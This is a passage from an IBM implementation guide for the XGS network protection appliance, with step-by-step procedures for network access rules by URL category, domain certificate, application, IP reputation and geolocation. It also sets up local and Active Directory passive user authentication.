XGS detects and blocks the user from accessing streaming
media
To navigate to Network Access Events, click the Monitor Analysis and Diagnostics link from
the main menu and then click Event Log. Select the Network Access Events tab. XGS has
generated an event for the associated network activity.
Hover over the event to view the details. In this example, rule 1, the
Network Access Policy rule was triggered.
44
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring a URL category in a Network Access
Policy to control access to certain websites
This use case describes how to configure a Network Access Policy to control the user’s access
to a specific URL Category. In this example, XGS blocks the user’s access to social media sites
using a URL Category.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
45
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
46
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
On the Application tab, Click New and select URL Category.
Use the URL Category objects to control access to certain types of websites
and to non-categorized web-based applications on your network.
Note:
The Network Protection database provides an indexed list of URL categories that you
might want to block or to limit access to on your network. These categories include
pornography, gambling, shopping, and social networking.
Tip: Use the Unknown URLs category to block or to log traffic to any URL that is not
categorized in the Network Access database.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
47
Implementation Guide for IBM Security Network Protection
In the Add URL Category window, specify the Name for the object.
Scroll down to Entertainment/Culture and expand the category.
48
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Scroll down and select the Social Media check box, and then click Save Configuration.
Add the new category to Added Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
49
Implementation Guide for IBM Security Network Protection
On the Inspection tab, add Default IPS object to Added Objects. On the Schedule tab, leave
Added Objects empty. Click Save Configuration and Deploy.
Accessing the social media site
Launch a browser and browse to http://flickr.com.
XGS intercepts access to the site.
50
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS detects and blocks user from accessing sites listed in
the URL Category
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
51
Implementation Guide for IBM Security Network Protection
Configuring a domain certificate category in a
Network Access Policy to control access to
SSL-enabled websites
This use case describes how to configure a Network Access Policy to control the user’s access
to a specific Domain Certificate Category. In this example, XGS blocks the user’s access to
web storage sites using a Domain Certificate Category.
A Domain Certificate List can be used in a Network Access Policy to allow or
deny access to a list of specific domains independent of a Domain Certificate
Category.
Note:
52
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
53
Implementation Guide for IBM Security Network Protection
On the Application tab, Click New and select Domain Certificate Categories.
In the Add Domain Category window, specify the Name for the object.
54
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Domain Categories tab, click the Filter
following parameters:
Match: all rules
Column: Available Domain Certificate
Condition: contains
Value: web storage
© Copyright IBM Corp. 2014
button and create a filter using the
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
55
Implementation Guide for IBM Security Network Protection
The Filter returns a list of Domain Categories with web storage content. Add Web Storage - All
to the Added Domain Certificates list. Click Save Configuration.
Add the new category to Added Objects.
56
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Inspection tab, add Default IPS object to Added Objects. On the Schedule tab, leave
Added Objects empty. Click Save Configuration and Deploy.
Accessing the social media site
Launch a browser and browse to https://www.dropbox.com.
XGS blocks access to the site.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
57
Implementation Guide for IBM Security Network Protection
XGS detects and blocks user from accessing sites listed in
the Domain Certificate Category
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
58
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring non-web applications in a Network
Access Policy to block certain applications from
communicating on the network
This use case describes how to configure the Network Access Policy to control a user’s access
to a non-web application. Use Non-web Application objects to control non-web applications that
can communicate with one another in your network. In this example, XGS controls a user’s
access to Skype.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
59
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
60
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
On the Application tab, Click New and select Non-Web Application.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
61
Implementation Guide for IBM Security Network Protection
In the Add Non-web Application Object window, specify the Name and select the Skype – VOIP,
Instant Messaging check box.
Non-Web Application objects contain individual desktop applications or
protocols used by these applications. XGS also provides a limited number of
application categories, including commonly used applications that you might want to
reject or to allow access to your network. These include peer-to-peer (P2P)
applications, instant messaging applications, and social networking applications.
Note:
62
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Restriction tab, select Any for the Protocol and click Save Configuration.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
63
Implementation Guide for IBM Security Network Protection
Add the newly created Non-web Application object to Added Objects
On the Inspection tab, add the Default IPS object to Added Objects. On the Schedule tab,
leave Added Objects empty. Click Save Configuration and Deploy.
64
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Installing Skype
Upon downloading Skype, launch the executable and complete the installation.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
65
Implementation Guide for IBM Security Network Protection
After the installation completes, log in to Skype.
Note that the application tried to connect to the Skype servers but failed.
66
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS detects and blocks user from connecting to Skype
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
67
Implementation Guide for IBM Security Network Protection
Configuring IP reputation to block access to
external servers
This use case describes how to configure the Network Access Policy to control the user’s access
to specific IP addresses that have a reputation of providing spam, anonymous proxies, dynamic
IP addresses, or malware. In this example, XGS blocks the user’s access to an IP address
categorized as an Anonymous Proxy in the IP Reputation category.
68
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access Policy
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
69
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects
On the Application tab, select New > IP Reputation Category to create a new IP Reputation
category object.
70
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Enter the following attributes and parameters for the IP Reputation category object and save the
configuration.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
71
Implementation Guide for IBM Security Network Protection
On the Application tab, add the new IP reputation object to Added Objects.
Save the configuration and deploy the changes.
72
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS detects and blocks user from accessing Anonymous
Proxies IP
For demonstration or testing purposes, verify the IP address classification via AppLoupe. In this
example, 91.216.73.32 is categorized as Anonymous Proxies (86%).
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
73
Implementation Guide for IBM Security Network Protection
Launch the web browser and access the IP address categorized as an anonymous proxy.
XGS blocks the access.
If you have a packet capture of the network traffic, you notice that the HTTP request was
intercepted by XGS and XGS responded with a “Website Blocked” message.
74
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log.
Select the Network Access Events tab. Verify the rejected events.
Launch a command line prompt and ping to the IP address. You will notice that the IP address is
unreachable.
The Network Access Events shows the ICMP traffic being blocked.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
75
Implementation Guide for IBM Security Network Protection
Optional: Event data forwarded to SiteProtector and QRadar
XGS sends the following event to SiteProtector when it is managed by SiteProtector.
76
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS sends the following syslog event to the QRadar Console when the Remote Event log
object is configured as a response in the Network Access Policy rule.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
77
Implementation Guide for IBM Security Network Protection
Configuring Geolocation to block access to
external servers
This use case describes how to configure the Network Access Policy to control user access to
an IP address hosted in a specific geographical location. In this example, XGS blocks the user’s
access to an IP address located in Japan.
78
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access Policy
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
79
Implementation Guide for IBM Security Network Protection
Select the Response tab and add an Event log object to Added Objects. On the Source tab,
add Any to Added Objects and leave the others in Available Objects.
Select the Destination tab and select New > Geolocation to create a Geolocation object for
Japan.
For Name, enter Japan. In this example, a Network Access Policy rule blocks the traffic to the
Japan region.
80
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Geolocations tab, add the Japan Geolocation to Added Geolocations and save the
configuration.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
81
Implementation Guide for IBM Security Network Protection
On the Destination tab, add the new Geolocation object to Added Objects.
Save the configuration and deploy the changes.
82
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
XGS detects and blocks users from accessing IP addresses
hosted in the geolocation
For demonstration or testing purposes, verify the IP address via the AppLoupe site. In this
example, The IP address of www.jnto.go.jp is 202.79.244.228 and the IP address is hosted in the
Japan region.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
83
Implementation Guide for IBM Security Network Protection
Launch the web browser and navigate to www.jnto.go.jp (202.79.244.228).
Because the IP address is located in Japan, XGS blocks the access.
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab.
84
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Optional: Event data forwarded to SiteProtector and QRadar
XGS sends the following event to SiteProtector when it is managed by SiteProtector.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
85
Implementation Guide for IBM Security Network Protection
XGS sends the following remote syslog event to the QRadar Console when the Remote Event
Log object is configured as a response in the Network Access Policy rule.
86
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring Local Authentication to control web
access based on user identity
This use case describes how to configure local authentication and the Network Access Policy
to control web access based on user identity. In this example, XGS requires the user to be
authenticated prior to accessing a website in the Social Networking-Business Networking URL
Category, such as LinkedIn.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
87
Implementation Guide for IBM Security Network Protection
Creating a user for local authentication
Navigate to Manage System Settings > Identity Settings > Local Users.
88
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the New button to open the Add Local User window. Type the appropriate values in the
User name, Name, Email, Password, and Password Confirmation fields. The User name is
used for authentication.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
89
Implementation Guide for IBM Security Network Protection
On the Group Membership tab, you can add the new user to existing groups. In this use case,
however, group membership is not used. Click the Save Configuration button.
The new user record is created. The following message appears because the mail server is not
configured in this environment.
90
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring the IP address for the Protection Interfaces
This setting defines the IP address that users are redirected to by a Network Access Policy rule
when the following circumstances occur:
- User authentication is required
- XGS rejects access to a website
To navigate to Protection Interfaces, click the Manage System Settings link from the main
menu and then click Protection Interfaces under Network Settings.
Tip: It is recommended that you make changes to the Protection Interfaces only
during noncritical hours.
Set the check box for the protection interface and click Edit.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
91
Implementation Guide for IBM Security Network Protection
On the General Settings tab, select the Enable check box and set the Inspection Mode to
Protection.
92
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the IPv4 Settings tab and enter IP address information for the Address, Netmask, and
Gateway fields. The NAP rule uses the IP address for user authentication or blocking HTTP
traffic. This IP address is also used by the Outbound SSL Inspection policy if enabled. Save
the configuration and deploy the changes.
The local management interface restarts.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
93
Implementation Guide for IBM Security Network Protection
Configuring a Network Access Policy rule to authenticate
users
Click the Secure Policy Configuration link from the main menu and select Network Access
Policy.
On the General Configuration tab, click the New button and enter 1 in the Order field. Set the
Action field as Authenticate (Reject) . The action redirects a user to an authentication page on
XGS.
If you enable user authentication on XGS and do not enable Outbound SSL
Inspection, the end users who navigate to a secure website (that is, a website that
uses the HTTPS protocol) are not redirected to the authentication portal on XGS.
Instead, their browsers are reset. Therefore, it is recommended that you configure
Outbound SSL Inspection to enforce user authentication for access to secure
websites.
Note:
The Firefox browser shows “The connection was reset.” error message.
94
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add the
Unauthenticated Users object to Added Objects and leave the others in Available Objects. On
the Destination tab, add Any to Added Objects and leave the others in Available Objects. Click
the Save Configuration button.
The Unauthenticated Users object must be used with the
Authenticate (Reject) action in a Network Access rule so that the rule will only
apply to users who have not been authenticated.
Important:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
95
Implementation Guide for IBM Security Network Protection
Click the Secure Policy Configuration link from the main menu and select Network Access
Policy.
On General Configuration tab, click the New button and enter 2 in the Order field. Set the
Action field as Accept. The action redirects a user to an authentication page on XGS.
96
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
Click the Application tab. Click the New button and select URL Category to create a URL
Category application object.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
97
Implementation Guide for IBM Security Network Protection
In the Add URL Category Object window, under the Social Networking group, select Business
Networking. Click the Save Configuration button.
Tip: Twitter, Facebook, Google+, and Tumbler are categorized as Social Networking,
but LinkedIn is categorized as Business Networking.
98
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the URL Category object check box for and then move the object by clicking the arrow
button pointing to the right to. Save the configuration and deploy the changes.
Simulating an unauthenticated user accessing a website
Launch a web browser on the client machine and navigate to http://www.linkedin.com. This URL
is categorized as Business Networking and identified by the custom URL Category object.
Authenticate (Reject) action may block DNS traffic and the web
browser may display “Server not found”. In that case, it is important to add a rule
to allow the DNS traffic.
Important:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
99
Implementation Guide for IBM Security Network Protection
The web browser displays a warning message as it is redirected to a secure login page that is
hosted on XGS. Click the Continue to the website (not recommended) link and accept the
Self-Signed SSL server certificate.
In the Network Access Authentication page, type the User name and Password for the local
user created in the previous steps. Click the Sign On button.
100
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
After the authentication, XGS redirects the user to the LinkedIn website.
Navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link from
the main menu and then click Event Log. Select the Network Access Events tab. XGS has
generated an event for the associated network activity.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
101
Implementation Guide for IBM Security Network Protection
Click the Monitor Analysis and Diagnostics link from the main menu and then click Active
Sessions under Identity Settings.
The Active Sessions table shows logon information such as the User name, Directory Server
Name, IP Address of the client machine, and Logon Time.
Tip: To delete a user session and force reauthentication, select the check box for the
user and click the Delete button.
If a user authenticates from multiple IP addresses, each session is displayed
as a separate entry. If another user authenticates from the same IP address, the
session is overridden by the new user.
Note:
102
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Recommended rule order for enforcing user authentication
using the Network Access Policy
In the following example, the second rule redirects an unauthenticated user to the authentication
page on XGS. It is important to have a first rule to allow DNS traffic. If you do not, the second rule
rejects all DNS queries from a web browser and the browser does not send HTTP requests that
trigger the redirection to the authentication page on XGS.
You can use the third rule to audit HTTP access to business networking websites such as
LinkedIn. In this example, the rule generates events when Bob (the local user) accesses
LinkedIn.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
103
Implementation Guide for IBM Security Network Protection
Configuring passive authentication with the
Active Directory server
This use case describes how to configure passive authentication to control web access based on
user identity. Passive authentication requires installing the Logon-event Scanner software on the
Active Directory server. In this example, a Windows domain user logs on to a client machine that
belongs to a Windows domain. The Logon-event Scanner gathers the Windows logon events
and sends the information to XGS. This allows for controlling user access to websites without
requesting the user to authenticate to XGS.
104
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Setting up Active Directory Domain Service
To set up Active Directory on the Windows server, navigate to Start menu > Administrative
Tools > Server Manager.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
105
Implementation Guide for IBM Security Network Protection
Click the Add Roles link to start the Add Roles wizard.
Click the Next button.
106
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the Active Directory Domain Services check box and click the Next button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
107
Implementation Guide for IBM Security Network Protection
Click the Next button.
Click the Install button.
108
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The wizard ends with 1 warning message regarding a Windows update in this environment, but
you can ignore it. Click the Close button to finish the wizard.
After adding the Active Directory Domain Services role, run the dcpromo.exe program to
configure the Active Directory Domain Service.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
109
Implementation Guide for IBM Security Network Protection
In the Active Directory Domain Services Installation Wizard, make sure the Use advanced
mode installation check box is not selected and click the Next button.
Click the Next button.
110
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select Create a new domain in a new forest and click the Next button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
111
Implementation Guide for IBM Security Network Protection
Type coe.local in the FQDN of the forest root domain field and click the Next button. In this
use case, the user name is [email protected] and the Windows client machine is
winclient.coe.local.
112
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
The installer verifies whether the domain name has been used in the network.
Under Forest function level, select Windows Server 2008 R2 and then click the Next button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
113
Implementation Guide for IBM Security Network Protection
The Active Directory Server Installation Wizard can install the Active Directory with DNS server
component, if the DNS serverhas not been installed. Select the DNS server check box and click
the Next button.
Click the Yes button to continue.
114
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Leave the Database folder, Log files folder, and SYSVOL folder settings with default values
and click the Next button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
115
Implementation Guide for IBM Security Network Protection
Type the appropriate value in the Password and Confirm password fields and click the Next
button.
Click the Next button.
116
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Next button.
Click the Finish button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
117
Implementation Guide for IBM Security Network Protection
Click the Restart Now button.
Creating a Domain user on Active Directory
After installing the Active Directory, navigate to Start menu > Administrative Tools > Active
Directory Users and Computers to create a new Domain user.
118
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Users folder under the coe.local domain in the navigation tree.
Right-click the Users folder and create a new user.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
119
Implementation Guide for IBM Security Network Protection
In the First name field, enter Andrew . In the User logon name field, enter andrew. Click the
Next button.
Enter appropriate values for the Password and the Confirm password fields. For testing, clear
the User must change password at next logon check box and select the Password never
expires check box. Click the Next button.
120
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Finish button.
The new user Andrew is created in the Active Directory.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
121
Implementation Guide for IBM Security Network Protection
Configuring a Windows client for Active Directory
Log on to the Windows client machine as Administrator and configure the computer domain
setting to be a member of the coe.local domain.
122
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
You must have Domain Administrator authentication to add the computer to the domain.
Restart the Windows client machine
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
123
Implementation Guide for IBM Security Network Protection
On the Active Directory server, navigate to Start menu > Administrative Tools > Active
Directory Users and Computers to check the client computer.
Downloading the XGS SSL server certificate
Before installing the Logon-event Scanner software, you must download the SSL server
certificate of XGS. Launch a web browser to log on to the local management interface. Click the
Manage System Settings link from the main menu and then click Appliance SSL Certificate.
124
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Download PEM/Base64 encoded X.509 SSL Certificate button to start downloading
the XGS SSL server certificate file and save the file to the Active Directory server where the
Logon-event Scanner software will be installed. In this example, save the certificate file as
lmi.cert.
Configuring the Logon-event Scanner
Download the Logon-event Scanner installer from IBM Passport Advantage.
Tip: For IBM staff, this software is available at Software Sellers Workplace Software
Downloads site: https://w3.ibm.com/software/xl/download/ticket.do?openform.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
125
Implementation Guide for IBM Security Network Protection
Extract the downloaded zip file and run the SetupLogonEvents.exe file to start the setup
program.
Select a language and click the OK button.
126
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Next button.
Accept the license agreement and click the Next button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
127
Implementation Guide for IBM Security Network Protection
Use the default installation path and click the Next button.
128
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Enter the following values for the fields.
Target Hostname for Logon Events: 192.168.5.105
Target Port Number: 443
Target Servlet Name: /logonevent/logonListner.xml
In this example, the Logon-event Scanner sent the logon information to the IP
address assigned to the protection interfaces of XGS, but it can send the data to the
management port too. In this example, if XGS is deployed in IDS mode and no
protection interfaces exist, you can configure the Logon-event Scanner to send the
Windows logon events to the management port IP address.
Note:
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
129
Implementation Guide for IBM Security Network Protection
For the Scanning Interval in MS field, enter 500. In the Max Events Per Transmission field,
enter 100.
130
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Select the Enable SSL and Use Basic HTTP Authentication check boxes . Enter a Username
and Password, which you also provide when you configure the Logon-event Scanner in the XGS
local management interface. Click the Next button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
131
Implementation Guide for IBM Security Network Protection
Click the Choose button and select the XGS SSL server certificate file that you downloaded in
the previous step. Click the Open button.
132
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Click the Next button.
Click the Install button.
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
133
Implementation Guide for IBM Security Network Protection
The installation process commences.
Click the Done button to complete the installation.
134
XGS for Techies
© Copyright IBM Corp. 2014
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
Implementation Guide for IBM Security Network Protection
Configuring Remote Directory Servers
Navigate to Manage System Settings > Identity Settings > Remote Directory Servers.
Click the New button to open the Add Directory Server window. On the General tab, select the
Enable check box and enter the following values:
Priority: 1
Name: AD DC Server
Type: Active Directory
Server address: 192.168.5.128 (the IP address of the Active Directory server)
Port: 389
Timeout: 60
© Copyright IBM Corp. 2014
XGS for Techies
Materials may not be reproduced in whole or in part without the prior written permission of IBM.
135
